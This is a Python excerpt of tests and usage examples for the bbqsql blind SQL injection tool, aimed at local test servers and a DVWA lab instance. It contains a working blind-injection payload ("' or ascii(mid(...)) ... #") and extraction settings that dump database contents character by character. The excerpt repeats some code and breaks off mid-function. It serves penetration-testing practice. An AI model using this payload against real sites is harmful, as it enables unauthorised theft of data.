def test_frequency_technique(self):
    """Check that a 'frequency_search' run returns the expected dump.

    The run is pointed at the local test endpoint 127.0.0.1:8090 (route
    ``/boolean``) with ``comparison_attr='size'`` and ``concurrency=1``; the
    result of ``run()`` must equal the module-level ``test_data``.
    """
    # URL template: the whole query string is the ${injection} slot.
    target = bbqsql.Query('http://127.0.0.1:8090/boolean?${injection}')

    # Parameter template, passed through `quote`.
    # NOTE(review): the values after ':' look like per-field defaults -- confirm
    # against bbqsql.Query.
    params = bbqsql.Query(
        "row_index=${row_index:1}&character_index=${char_index:1}&character_value=${char_val:0}&comparator=${comparator:>}",
        encoder=quote,
    )

    # Both templates are handed over via their q_string attribute.
    engine = bbqsql.BlindSQLi(
        url=target.q_string,
        query=params.q_string,
        method='GET',
        comparison_attr='size',
        technique='frequency_search',
        concurrency=1,
    )

    dumped = engine.run()
    self.assertEqual(dumped, test_data)
def fetch_(field, interact=False):
    """Build the blind-extraction query for ``field`` and run it.

    ``field`` is spliced into the query text with ``%``. If it contains the
    lowercase substring ``'from'`` it is wrapped as a one-row sub-select
    (``limit 1 offset ${row_index:1}``); otherwise it is only parenthesised.
    Requests use GET and ``comparison_attr='status_code'``; the remaining
    keyword arguments come from the module-level ``attack_config``.

    Args:
        field: SQL expression or sub-select to read.
        interact: when true, ask for confirmation on the console before
            running, and only if the BlindSQLi object reports no error.

    Returns:
        The value of ``run()``; ``None`` when the interactive path does not
        run (an error was set, or the prompt was declined or interrupted),
        in which case ``b.error`` is printed.
    """
    # NOTE(review): the listing had lost its indentation. The nesting below is
    # the reading in which the final `else` pairs with `if interact` and the
    # print sits at that branch's level -- confirm against the original file.
    wrapper = '(%s limit 1 offset ${row_index:1})' if 'from' in field else '(%s)'
    subquery = wrapper % field

    template = bbqsql.Query(
        "' or ascii(mid(%s, ${char_index:1}, 1))${comparator:>}${char_val:0} #"
        % subquery
    )
    runner = bbqsql.BlindSQLi(
        url=url,
        query=template,
        method='GET',
        comparison_attr='status_code',
        **attack_config
    )

    # Non-interactive callers go straight to the run.
    if not interact:
        return runner.run()

    if not runner.error:
        try:
            answer = raw_input('Everything lookin groovy?[y,n] ')
        except KeyboardInterrupt:
            # Ctrl-C at the prompt counts as "no".
            answer = False
        # An empty answer, or one starting with 'n', declines the run.
        if answer and answer[0] != 'n':
            return runner.run()

    # Reached on a setup error and also when the run was declined.
    print(runner.error)
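'''
#STATUS CODE BASED EXAMPLE
url = bbqsql.Query('http://127.0.0.1:8090/error?${injection}')
query = bbqsql.Query("row_index=${row_index:1}&character_index=${char_index:1}&character_value=${char_val:0}&comparator=${comparator:>}",encoder=quote)
bh = bbqsql.BlindSQLi(url=url,query=query,method='GET',comparison_attr='status_code',technique='frequency_search',concurrency=35)
start = time()
results = bh.run()
stop = time()
print "dumped db in %f seconds" % (stop-start)
'''

# SIZE BASED EXAMPLE
# The only example in this excerpt that is live code; the status-code example
# above is disabled by the triple-quoted string around it. It runs against the
# local test server's /boolean route with comparison_attr='size' and three
# concurrent workers.
url = bbqsql.Query('http://127.0.0.1:8090/boolean?${injection}')
query = bbqsql.Query(
    "row_index=${row_index:1}&character_index=${char_index:1}&character_value=${char_val:0}&comparator=${comparator:>}",
    encoder=quote,
)
bh = bbqsql.BlindSQLi(
    url=url,
    query=query,
    method='GET',
    comparison_attr='size',
    technique='frequency_search',
    concurrency=3,
)

# Wall-clock timing of the whole run.
start = time()
results = bh.run()
stop = time()
# Parenthesised so the line parses both as a Python 2 print statement and as a
# Python 3 print() call; the printed text is unchanged.
print("dumped db in %f seconds" % (stop - start))

# TEXT BASED EXAMPLE
# Disabled in the original by an opening ''' whose closing delimiter lies
# beyond the end of this excerpt; shown as comments because the listing is cut
# off part-way through the block.
# url = bbqsql.Query('http://127.0.0.1:8090/boolean?${injection}')
# query = bbqsql.Query("row_index=${row_index:1}&character_index=${char_index:1}&character_value=${char_val:0}&comparator=${comparator:>}",encoder=quote)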
# Module-level bbqsql settings used by this script.
bbqsql.settings.PRETTY_PRINT_FREQUENCY = 1.0
bbqsql.settings.QUIET = False

# Keyword arguments that fetch_() forwards to bbqsql.BlindSQLi via **.
# `sessid` is defined outside this excerpt. The original assigned
# 'technique' twice ('binary_search', then 'frequency_search'); only the
# second value ever took effect, so it is the one kept here.
attack_config = {
    'cookies': {
        'PHPSESSID': sessid,
        'security': 'low',
    },
    'technique': 'frequency_search',
    'concurrency': 5,
    'menu_mode': False,  # prevent printing '\n'*100
}

# dvwa
url = bbqsql.Query(
    'http://localhost:9191/vulnerabilities/sqli_blind/?id=${dejection}&Submit=Submit',
    encoder=quote,
)


def fetch_(field, interact=False):
    sql = ('(%s limit 1 offset ${row_index:1})' if 'from' in field else
           '(%s)') % field
    query = bbqsql.Query(
        "' or ascii(mid(%s, ${char_index:1}, 1))${comparator:>}${char_val:0} #"
        % sql)
    b = bbqsql.BlindSQLi(url=url, query=query, method='GET',
                         comparison_attr='status_code', **attack_config)
    if interact:
        # (the excerpt ends here; the body of this branch is not shown)